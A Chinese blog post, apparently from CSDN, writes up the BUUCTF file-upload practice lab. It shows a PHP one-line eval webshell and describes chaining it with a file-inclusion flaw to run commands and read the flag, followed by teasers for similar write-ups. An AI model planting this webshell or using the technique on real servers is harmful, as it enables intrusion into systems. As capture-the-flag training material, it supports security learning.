BUUCTF Basic BUU UPLOAD COURSE 1

最新推荐文章于 2025-10-19 09:38:27 发布
原创 最新推荐文章于 2025-10-19 09:38:27 发布 · 3.8k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言 #安全 #web安全

博主发现靶机存在文件包含漏洞,通过上传PHP木马成功执行命令。上传文件功能限制了文件名,但不影响攻击。最终在根目录找到flag。

目录

1、访问靶机发现存在文件包含。

 2、上传界面可以上传任意文件,但上传后系统把文件名都改为xxx.jpg。

3、尝试上传PHP一句话木马cmd.php

 4、连接一句话木马,在根目录找到flag,

1、访问靶机发现存在文件包含。

上传文件 (buuoj.cn)icon-default.png?t=M276http://13b28a01-a06b-4f09-ba4f-c4573f51fd63.node4.buuoj.cn:81/index.php?file=upload.php

 2、上传界面可以上传任意文件,但上传后系统把文件名都改为xxx.jpg。

3、尝试上传PHP一句话木马cmd.php

<?php
	@eval($_POST['cmd']);
?>

 4、连接一句话木马,在根目录找到flag,

 

 

BUU UPLOAD COURSE 1-文件上传
lin__ying的博客
12-27 868
看到flag,双击打开。在文件中写入以下木马。
BUUCTF_upload-labs 第一题
satasun的博客
07-30 2615
Pass-01 首先,查看源码,在源码的最低端发现了这个: 这个是js代码,看不懂。但是大概猜出来上传类型必须为.jpg .png .gif三者之一。这个判断是在前端的,比较好绕过。可用方法有好几种: 1.下载火狐的插件,禁用前端js。(这个用处不是很多,不做介绍) 2.使用BP抓包,修改文件名。 3.将文件名命名为xxx.php.jpg类型绕过。 先上传一张正常图片试试: 上传成功,并且可以复制图片地址。 复制图片地址后,在浏览器打开: 这个就是我上传的图片。证明我们上传的图片名字没变,而且存放地
2025.1.20——二、buuctf BUU UPLOAD COURSE 1 1 文件上传
2402_87387800的博客
01-22 901
题目来源:buuctf BUU UPLOAD COURSE 1 1
BUUCTF--BUU UPLOAD COURSE 1
qq_46263951的博客
07-05 2964
解法1: 当我们随便上传一个.PHP文件时发现后缀名自动更改为.jpg文件,由于并不清楚漏洞点,所以我们测试是否存在文件包含漏洞 通过观察我们可以发现file是接收文件的,所以我们上传一个.php文件进行探测 <?php echo 'Hello World!'; ?> 通过测试我们发现即使文件扩展名修改为.jpg,但.php文件依然可以执行 我们上传一句话木马进入服务器即可拿到flag ...
BUU UPLOAD COURSE 1 1 新手解题思路
最新发布
weixin_47074981的博客
10-19 134
BUU UPLOAD COURSE 1 1 新手解题思路
BUUCTF——BUU UPLOAD COURSE 1
2301_78190890的博客
07-28 383
php ....?>是PHP代码的标签,表示其中是PHP代码。@则是抑制错误显示(即使代码执行出错,也不会在页面上输出错误信息),避免引起人注意。进入网站,就是一个朴实无华的上传文件的界面,那就先尝试直接上传一个PHP文件。上传后访问该文件发现是可执行的,那就直接通过蚁剑去连接。,作用是将传入的字符串当作 PHP 代码来执行。上传成功后发现了保存路径,但是好像重命名了。,用于接收通过POST方法传递的数据。那就在试试看它会不会执行PHP文件。(不会用蚁剑的去搜一下,很容易的)$_POST则是PHP中的。
BUUCTF Basic BUU BURP COURSE 1解题WP
打工人
03-27 3921
1.启动靶机 访问靶机发现网页提示只能本机访问: 可能是检查请求头只的X-Real-IP字段。 2.使用BP测试 BP抓包,添加X-Real-IP:127.0.0.1测试,发现返回登录界面且包含登录信息: 3.根据上述信息,更改使用POST方法提交username=admin&password=wwoj2wio2jw93ey43eiuwdjnewkndjlwe 获取flag{69a567b4-7864-47f6-b854-186ad981de40} ...
BUUCTF/BUU SQL COURSE 1
weixin_44041994的博客
03-19 1080
登录按钮点击后是一个登陆界面,随意输入字符点击后显示提示信息"用户名或密码错误",并且抓包发现是提交的POST请求,可以对该登录界面进行暴破操作,但是因为需要猜解两个字段内容且密码内容无提示,时间需求比较久,且需要较庞大的字典。通过判断可知contents表应为热点新闻的数据表,admin大概率为用户表,所以我们构建sql根据表名查询该表下的各字段名,成功得到字段名:id,username,password。热点按钮显示热点列表,有三个新闻,里面只有无意义的字符串,但是地址栏显示了/content/1
buuctf-BUU SQL COURSE 1 sqlmap自动化工具解
2301_81574836的博客
02-12 820
buuctf-BUU SQL COURSE 1 sqlmap自动化工具解
buuctf-BUU LFI COURSE 1
cdcdcdcd123132的博客
04-20 433
BUU LFI COURSE 1 WP_moyikong的博客-优快云博客。BUUCTF在线评测 (buuoj.cn)PHP漏洞 借鉴大佬。
BUUCTF/BUU UPLOAD COURSE 1
weixin_44041994的博客
03-21 619
我们直接上传webshell文件,发现自动将php后缀改为了jpg后缀。后续通过一系列burp suit更改发现无法绕过。随手上传一个echo 123的php发现直接访问修改文件名后的文件,可以执行代码。重新上传webshell并用中国蚁剑进行连接。连接成功,在根目录下找到flag文件。打开靶机,发现是一个文件上传页面。输入flag值,通关成功。
BUUCTFBUU UPLOAD COURSE 1[WriteUP]
如有错误感谢斧正
04-06 733
这里我们构造的木马是POST的方式上传,那就用MaxHacKBar来执行。接下来把我们要执行的命令以POST的方式赋值给shell就可以命令执行了。eval函数是无法直接执行命令的,只能把字符串当作php代码解析。点击"Load URL"并且把刚才我们上传的文件路径粘贴到后面。经测试这里发现直接用一句话木马,用蚁剑连接也是可以成功的。的值使得服务器执行system命令。最后也是在根目录下找到了flag。也是可以在根目录找到flag。利用eval函数解析。
BUUCTF BUU UPLOAD COURSE 1
wangxinyu86的博客
11-11 298
打开靶机,发现需要上传文件,尝试一句话木马+蚁剑链接。把一句话伪装成jpg传入文件,发现没有被拦截。蚁剑连接主机,根目录下找到flag。
BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)
小谢的博客
10-25 3797
BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)题解
BUU UPLOAD COURSE 1basic
weixin_52942048的博客
10-07 779
请求参数:添加两个 {"file": "uploads/6520874b1e440.jpg", "x": "cat /flag"}1、先打开链接,上传一个普通文件,发现它会被默认存为一个jpg文件,那么通过蚁剑的方式是行不通的。3、将txt文件上传,复制图片地址,打开浏览器、BurpSuite代理,将请求参数进行修改。可以看到返回的结果中执行了 cat /flag。2、新建一个txt文件,将下面内容贴进去。
【CTF WebBUUCTF BUU UPLOAD COURSE 1 Writeup(文件上传+PHP+文件包含漏洞)
HEX9CF的技术博客
09-12 1393
1上课用~点击启动靶机。
BUUCTF Basic 解题记录--BUU UPLOAD COURSE 1
weixin_43171033的博客
10-07 1081
3、上传一句话木马,用jpg格式存储,然后在hackbar 的file= 参数后面替换掉上传的文件路径;并在postdata输入如下命令,执行即可获得flag。1、打开链接发现是让上传文件,随意上传一个txt文件发现直接显示jpg格式,然后尝试其他文件,上传后还是被改成jpg格式;2、打开Hackbar,发现在file= 这个参数替换掉刚才上传的文件路径,能查看到文件的内容;
BUU UPLOAD COURSE 1 文件包含
m0_74196038的博客
03-31 993
反思:这道题虽然难度不大,但是还是花了不少时间,一开始脑子全想着怎么去改后缀了,没有发现隐藏的文件包含这个利用点和file参数。eval函数是没办法直接执行命令的,它是把字符串当作php代码解析。1.页面是一个文件上传的接口,尝试上传一句话木马,上传成功,但是文件后缀被重命名。因为这里不是直接上传php文件,无法用蚁剑直接连接,只能用hackbar输入命令。system函数是php的函数,用来执行系统命令。eval结合system函数就可以执行系统命令。
BUUCTF BUU UPLOAD COURSE 1返回数据为空
06-19
BUUCTF平台中,BUU UPLOAD COURSE 1返回数据为空的问题可能由以下几种情况导致: 1. **文件上传后未正确处理**:上传的文件可能被服务器重命名或移动到其他路径,但页面未返回正确的文件访问路径[^1]。 2. **PHP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

努力工作的网安人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值